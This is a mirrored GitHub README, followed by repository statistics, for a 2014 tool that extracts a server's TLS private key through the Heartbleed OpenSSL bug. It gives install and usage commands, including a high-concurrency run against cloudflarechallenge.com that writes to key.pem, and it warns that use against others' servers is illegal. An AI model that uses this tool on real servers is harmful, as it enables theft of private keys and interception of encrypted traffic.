heartbleed

Extracting server private key using Heartbleed OpenSSL vulnerability.

Github星跟蹤圖

Heartbleed

Extracting server private key using Heartbleed OpenSSL vulnerability.

NOTE: Pointing this tool at other people's servers is illegal in most countries.

How to use

$ npm install -g heartbleed.js
$ heartbleed
Options:
  --host         [required]
  --port         [default: 443]
  --concurrency  [default: 1]

Missing required arguments: host

$ heartbleed -h cloudflarechallenge.com -c 1000 >> key.pem

Protip, use cheap ciphers:

heartbleed -h cloudflarechallenge.com -c 1000 --ciphers="AES128-SHA" >> key.pem

LICENSE

This software is licensed under the MIT License.

Copyright Fedor Indutny, 2014.

Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to permit
persons to whom the Software is furnished to do so, subject to the
following conditions:

The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
USE OR OTHER DEALINGS IN THE SOFTWARE.

主要指標

概覽
名稱與所有者indutny/heartbleed
主編程語言C++
編程語言Python (語言數: 3)
平台
許可證
所有者活动
創建於2014-04-15 16:55:58
推送於2014-11-28 22:18:43
最后一次提交2014-11-28 22:18:43
發布數12
最新版本名稱v0.2.7 (發布於 2014-04-24 23:58:30)
第一版名稱v0.1.0 (發布於 2014-04-15 17:13:10)
用户参与
星數394
關注者數18
派生數43
提交數36
已啟用問題?
問題數7
打開的問題數0
拉請求數1
打開的拉請求數0
關閉的拉請求數0
项目设置
已啟用Wiki?
已存檔?
是復刻?
已鎖定?
是鏡像?
是私有?